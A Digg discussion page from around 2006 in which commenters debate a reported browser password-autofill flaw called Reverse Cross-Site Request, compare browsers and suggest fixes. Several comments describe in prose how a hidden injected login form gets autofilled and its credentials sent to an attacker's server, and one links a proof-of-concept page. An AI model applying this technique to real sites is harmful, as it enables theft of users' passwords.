digg

Facebook Connect Join Digg About

Firefox password security hole

p2pnet.net Are you one of those people who lets Firefox save your passwords so you don't have to type them in again? That might not be such a good idea, Robert Chapin says. That's because he's found a new security hole in the Mozilla Firefox web browser he's calling a Reverse Cross-Site Request (RCSR).

Who dugg this? Made popular Nov 23, 2006

Digg DudeWhat is Digg?

Digg is a place for people to discover and share content from anywhere on the web. Digg surfaces the best stuff as submitted and voted on by the community. Take the Tour to learn more.

80 Comments

show profanity settings
expand all
  • beachbrian, on 10/12/2007, -4/+38do you have any idea how those work? ... here, have a cookie.
  • sockpuppets, on 10/12/2007, -1/+27I wish I hadn't named my dog "password" now.
  • elnerdo, on 10/12/2007, -5/+26...

    "3. This is not a security hole, it is by design."

    Why do you even talk?
  • robdazomba, on 10/12/2007, -2/+22Truly impressive, the computer geek who can pick on teenage girls. Just hope you never meet one of them in person as I'm sure many of them could kick the living crap out of you without breaking a sweat.
  • CaffeineAddict, on 10/12/2007, -2/+21Ok, I read through the story and while this doesn't just effect Firefox ... it is a browser exploit.

    What happens is that any web site that you have a saved user name / password for that also allows users to submit HTML code for others to view aka myspace, vb/phbb forums that have this enabled (not default setting), Blogs that allow for HTML submissions etc ... will alow a clever script-kiddy to fake a username / password entry form that shows up to the browser (which most browsers will auto fill per your settings) but may not be visable to the person looking at the site ... furthermore the script-kiddy will put a link in the form of a transparent image overtop of this form ... and the link will take the information out of the username / password entries and put into the url in your address bar.

    Its kinda hard to explain with out seeing it live. A proof of concept verson is available in the link provided below DO NOT TYPE IN A REAL USERNAME OR PASSWORD just a fake one so you can see how it works ... and when IE or FF ask you to remember the password you must select [yes]

    http://www.info-svc.com/news/11-21-2006/rcsr1/

    Yes, this does work ... yes this is a security hole for both firefox, IE, and any other web browser that allows you to save passwords to have them auto fill out the username / password section of a website.

    For any of you who saw the mass password list with 48,000 username / passwords for myspace yesterday before the digg admin made it disappear from digg ... this is most likely how they got all the passwords
  • tpaine, on 10/12/2007, -0/+15Keep in mind that a site must also allow users to post unmolested html (eg: myspace). However, if you clicked on one of these RCSR images while visiting myspace.com they can *not* grab your BofA.com password, only the myspace.com password.
  • marko25, on 10/12/2007, -1/+14Opera is NOT vulnerable.
    Test it here: http://www.info-svc.com/news/11-21-2006/rcsr1/
  • arunforce, on 10/12/2007, -3/+16It's called phishing, dumbass.
    Now give me my 5 bucks.
  • LecherousVenom, on 10/12/2007, -9/+21Buried as "Inaccurate."

    This is not a FF exploit - it exploits multiple browsers.

    Maybe i missed something, but this seems like a scripting exploit, and not a "browser" exploit, per se. For this to work, you'd have to have access to the domain in question to post exploit code....maybe this could be done in a comments section, but otherwise it's nigh impossible to implement on a site you don't own.

    Can someone explain if I'm wrong about this?
  • teddyrux, on 10/12/2007, -3/+13How can you call this unfortunate? The more people that use the program, the more there are to expose the problems, the more people there will be to patch them. It's a benefit of success, not a downfall.
  • cds0528, on 10/12/2007, -2/+11wow that stinks... Am I the only one who didn't really want to click on that demonstration link?
  • shakin, on 10/12/2007, -0/+9"There is simply no way for an open-source program to securely save passwords through a two-way algorithm without a master password."

    There is no more risk associated with open source programs than there is with closed source programs. Whenever passwords are saved for a user it is a good idea to keep them encrypted with a key created by the user. This is what global password managers do (OS X keyring, KDE wallet, Gnome keyring). Unfortunately, Windows doesn't have such a thing. I think Firefox should use the global password manager on systems that support it.
  • PatrickFisher, on 10/12/2007, -19/+28Well, the more popular Firefox becomes, the more bugs and security holes we'll see. It's unfortunately inevitable.
  • MikeKnoop, on 10/12/2007, -0/+8This isn't a hack per say, I mean, Firefox will automatically fill in a hidden password field. That's what the password remember feature is. You need the content to sit on the domain you want to exploit too, severely limiting how effective this is.

    I figure you could easily fix this by not auto completing hidden fields. But even then you could put content OVER the fields and hide them...

    Meh, it's a mess.

    -Mike
  • toomuchgreentea, on 10/12/2007, -0/+8@qbm85
    I'm not sure what you're saying is relevant at all. And as far as I can tell, this is how the "hack" works:

    Firefox fills in the username and password based on the domain, and because the form is filled immediately after the page is loaded, it can be extracted using javascript and sent anywhere. But first and foremost, you'll have to match the domain, and that can't be done using a phishing site with misplace/international characters. You can only do that on one of the site's pages.

    And it has absolutely nothing to do with whether you have encrypted the passwords you stored on your HD.
  • tony134340, on 10/12/2007, -0/+8Same here.

    Rule #1: Never store your important passwords on a PC. I keep mine on a password protected USB drive and the master password in my head.
  • HuwJanus, on 10/12/2007, -1/+8This doesn't work on Opera so Ill stick with that.
  • CaffeineAddict, on 10/12/2007, -0/+6I opened it up with IE just to find out what it was ... the link is harmless, this browser bug only really works on places your familiar with AND have the ability for users to submit HTML code for others to view ... aka myspace, phpbb forums, blogs etc ... it will only work on a site that you have saved a password for ... and only will allow them to steal the password for that one site.

    For instance if it was built into some ones myspace page ... it would only allow it to steal your myspace password. If its just on some random website ... it cant steal anything but the nonexistant username / password that you have never set up for that website that you have never been to before
  • merreborn, on 10/12/2007, -2/+8IE has this flaw as well, and has no plan to correct it. I'm not sure about opera.
  • takeda, on 10/12/2007, -0/+6Looks like once again Opera had a better solution from the start.
    Instead filling the form automatically, to get logged in you need to click on the wand icon (it automatically cliks the submit button).

    PS. I just saw IE7 today... I have doubts that they'll regain their market share... Actually IE6 looks way better.
  • ccheath, on 10/12/2007, -0/+4best comment yet
  • triple110, on 10/12/2007, -1/+4@NovaMonket

    A mental note you should make to yourself...admitting that you have committed a crime on a very public website will only lead to cars with pretty lights at your door. If you think you are going to become some famous haxor now, your are wrong. Grow up
  • tpaine, on 10/12/2007, -2/+5I think you are mistaken. When I read the title I thought the same thing, but this has nothing to do with the master security password, it's an actual hack.
  • takeda, on 10/12/2007, -0/+3"Browsers do have some options to make this type of phishing harder.
    - Only pre-fill form fields if they are visible (check css etc.)"

    This is not a good solution, abusers will try different techniques (e.g. moving form somewhere out of viewing area, changing colors etc, I'm sure they'll find multiple ways, and fixing all of this would be pretty ugly).

    "- Only pre-fill form fields if they are at the *exact url* where you saved the info (if it's another URL on the same domain, ask the user first)"

    This would break a lot of sites (for example you have site with a lot of pages - maybe a forum) if user tries to access some page that is restricted instead of seeing that page it will see login/password screen, then after entering the informations the user will be able to view the page. In that case each time the link will be different.

    "- Always ask the user before pre-filling forms."

    I think Opera did it right, instead of prefilling form, and waiting for user to click submit, you have a special button called "wand" on the login page you just click that button, and opera fills all of the details and automatically clicks submit.
    It solves that security issue, and is actually mure convenient, since ou don't need to search for the submit button, ou have wand always in the same place (you can also call it using a shortcut or a mouse gesture, which is even more convenient).
  • Majken, on 10/12/2007, -1/+4What happens is when you go to www.digg.com and tell firefox to remember your password, it will then fill out that username and password on ANY site that is on digg.com so, it'll do digg.com/login digg.com/relogin digg.com/post etc. It will NOT work on digg.com.myspace.com/login or myspace.com/digg.com/

    As far as I understand it, the fact that firefox is autofilling the passwords isn't the problem, it's that people will then hit the submit button. Although people that will hit the submit button are also likely to fill in the username/password by hand.

    As someone said earlier, this is sophisticated phishing, not a security hole in the password code. You shouldn't have to worry about your banking passwords, because if someone has hacked into your banking website to put up a fake login page, then what else have they been able to do, with or without your password?

    The question is, what should browsers do to protect users from this, what should hosts do to protect users from this, and what should users do to protect themselves.
  • kennyvader, on 10/12/2007, -1/+3@CaffeineAddict: the example site you give doesn't seem to suffer the problem in Opera or IE7? Does it only affect IE6 and FF?
  • drudometkin, on 10/12/2007, -1/+3I never save my bank information in the password saver thing, but stuff like my digg account and other minor things like that i do. I use safari primarily, but I use firefox all the time too.
  • inactive, on 10/12/2007, -1/+3This is a problem for websites that allow *any* user provided HTML, like myspace. A malicious user can present their own login form.

    Here's the issue: browsers like Firefox and IE will autofill this malicious login form with your myspace username and password, without any intervention on your part. The form could even be hidden from view. The browsers do this because the form is hosted from the myspace.com domain, even though it was created by some malicious user.

    Then, the malicious page simply gets you to click on something that will submit form, like a movie or picture, and presto, your password is submitted to the destination of their choice without you knowing that anything is irregular.

    Most web sites don't allow users to generate this kind of html -- the exploit can't be used to get your Digg password or your bank account -- but it can be used on myspace. It's one of many exploits that target myspace users. Outside of myspace it's not a threat.
  • CaffeineAddict, on 10/12/2007, -1/+3@kennyvader

    It doesn't matter on the browser as much as on the browser's settings and the way people use it.

    Any browser that remembers your password and has the capability to auto log you in to a website (website that doesn't support this through a cookie already) will be effected by this "bug"

    as mentioned below, this is not as much of a bugg as advanced phishing ... its like someone sitting in front of a free concert (who is not affiliated with said concert) asking for ID to let you in. Most people would go with the flow and present there ID, much as the browsers in question would present your credentials (username/password) when the HTML on a trusted website asks for it ... the problem is that these sites allows users to upload un-filterd HTML and then presents this un-tested/un-trusted HTML to run with the credentials of the trusted domain (website).
  • inactive, on 10/12/2007, -6/+8Firefox is still vulnerable to clogged tubes. The fix would be more online gambling.

  • miaow, on 10/12/2007, -0/+2http://www.computeractive.co.uk/computeractive/news/2168209/computer-hacker-receives
  • LecherousVenom, on 10/12/2007, -0/+1@ Caffeine: Thanks for the explanation....makes more sense now.
  • lilme, on 10/12/2007, -0/+1@astrosmash

    You wouldn't even have to trick the user into clicking on something to submit the form. You could set a 3 second timer to allow the browser to fill in the hidden fields after page load, then submit the data back to the server via an XMLHttpRequest object.
  • lilme, on 10/12/2007, -0/+1Browsers do have some options to make this type of phishing harder.

    - Only pre-fill form fields if they are visible (check css etc.)
    - Only pre-fill form fields if they are at the *exact url* where you saved the info (if it's another URL on the same domain, ask the user first)
    - Always ask the user before pre-filling forms.
  • jamesong14, on 10/12/2007, -0/+1I just recently start using Firefox browser, truly i didnt know there is a bug on it, i do let Firefox to remember my id and pw for some of the website. thanks for reminder. useful article!
  • zanzaman, on 10/12/2007, -0/+1Mac OSX: the hack mentionned reveal login & password in Firefox but NOT in Safari
  • xswag, on 10/12/2007, -1/+2What about KeePass? Thats my new favorite password manager and you can use it from a USB Flash Drive.
    http://keepass.sourceforge.net/
  • sunetos, on 10/12/2007, -0/+1Well, it's definitely something to be aware of. However, all of the following conditions have to be met for this to steal a password:

    1) You have to have already saved your pass on domain.com with autocomplete turned on
    2) Domain.com must be a site that allows 3rd parties to post whatever HTML they want. It has to be third parties, b/c of course, domain.com already has your username/pass, so they wouldn't have anything to gain
    3) The 3rd party would have to entice you to click on their form which calls a javascript submit function for the form.
    4) The form would have to be allowed to submit to a domain that is NOT domain.com, otherwise this 3rd party would have no way to retrieve your info. Apparently, IE6 and FF2 both allow this. It's rather embarrassing that FF2 still allows this IMHO

    From what I see, the obvious fix is to stop allowing javascript forms to submit cross-domain, just like the way ad blockers block images/flash that load from a different domain.
  • joeysafe, on 10/12/2007, -0/+1@poseiton
    Good explanation, bad guess (tested). Opera is safe as pie and all I use.
  • Majken, on 10/12/2007, -0/+1It could be solved by doing what IE does, and only save the password for the EXACT same page all the time. This is annoying in a lot of places where if you're not logged in the url doesn't redirect to site.com/login.php but will direct to site.com/pageyouwanttoposton?login.php and then direct back to the page you were trying to post on.

    At the same time though, if someone has hacked the site, they can easily hack the login page itself and change where the submit button sends your username and password. There is no way to solve this without the domain hosts securing their sites.
  • poseitun, on 10/12/2007, -0/+1You have to CTRL-Click or press CTRL-Enter in Opera to use a prestored password in a login box. Usually you don't use this key-combo for clicking on an image ;-)
    So Opera is not vulnerable in the same way as FF. But if you can trick a user to ctrl+click on an image (like this exploit)... I think you are all set... I haven't tested it though.
  • gcauthon, on 10/12/2007, -0/+1What exactly is the vulnerability? If you give your password to a site, then that site has your password. Is that a surprise? The site is free to give your password out to other sites. Again, is anyone surprised by this revelation? This is why you don't use the same password on every single site out there, especially sites you're unfamiliar with.

    This is extremely misleading. The proof of concept does not do anything you don't explicitly tell it to do. You have to type in a password for their site and they fashion a link with your password in it. Anyone who thinks this is a vulnerability does not understand how passwords work.

    As others have stated, this has nothing to do with Firefox or even Javascript. If a site wanted to, they could just dump their password database to a file and email it to Google directly. Why mess around with the scripting?
  • Gregac, on 10/12/2007, -1/+1If I read right it does not matter whether you have a master sent the attacker acts as an indirect intermediary. Your browser would send the information to the regular site as usually however the intermediary could see it regardless, this appears it would work in all browsers, also it appears the attacker has to compromise the said site with some code injection algorithm, I am thinking if they can get access to a companies web server in the first places, there are lots of other things they could do than just intercept login scripts.
  • DrDemo, on 10/12/2007, -0/+0
    If you are inclined to allow the saving of passwords.
    All is safe again, thanks to Sebastian Tschan.
    We now have the Opera functionality with a Firefox Extension...

    Secure Login: https://addons.mozilla.org/firefox/4429/

    A login extension similar to Opera's Wand login.
    It uses the built-in password manager, but deactivates the prefilling of login forms.
  • mbthompson, on 10/12/2007, -3/+3I'm guessing it will be patched by tomorrow.
  • followme, on 10/12/2007, -2/+2http://www.siteadvisor.com/sites/p2pnet.net?ref=safe&aff_id=0
  • Andos, on 10/12/2007, -0/+0Simple way to put it:

    UserA and UserB joins "CommunitySite"

    UserB posts some malicious HTML and Java Script on CommunitySite's pages which UserA sees.
    Because of the exploit, UserB will now have UserA's password. Not that great is it?

    I don't know how they could fix this, but I guess the browsers could prevent form fields that has been automatically filled from being read by java script without asking the user for permission. Or maybe even ask the user before any XMLHttpRequest if nothing else works.
  • KB1775, on 10/12/2007, -0/+0this is a major security concern and could potentially have a large impact on electronic commerce if word gets out. So many people shop online and use electronic transactions because they believe the transactions to be safe/secure and reliable. With so many companies depending on electronic commerce to support their buisness and so many people using passwords to shop online, this bug could be disasterous to ecommerce. Seems like the ease of saving your password online might be outweighted by the possibility of having someone steal your password to myspace and than try it on everyother site you visited to buy something. Some of those sights have credit card information and other sensitive information stored on them as well.
  • mmweb, on 10/12/2007, -0/+0Try RoboForm. I made good experiences with it. But I don't know, if it solves this problem. Do you know?
  • CaffeineAddict, on 10/12/2007, -1/+1ding ding ding ... we have a winner
  • Fetching more discussions...
    Show 51 - 80 of 80 discussions

  • Add a Comment

    Login or register to comment!
    Or, sign-in super fast with your Facebook account ...


© Digg Inc. 2009 — Content created and posted by Digg users is dedicated to the public domain | Terms of Use Updated | Privacy Policy
DIGG, DIGG IT, DUGG, DIGG THIS, Digg graphics, logos, designs, page headers, button icons, scripts, and other service names are the trademarks of Digg Inc.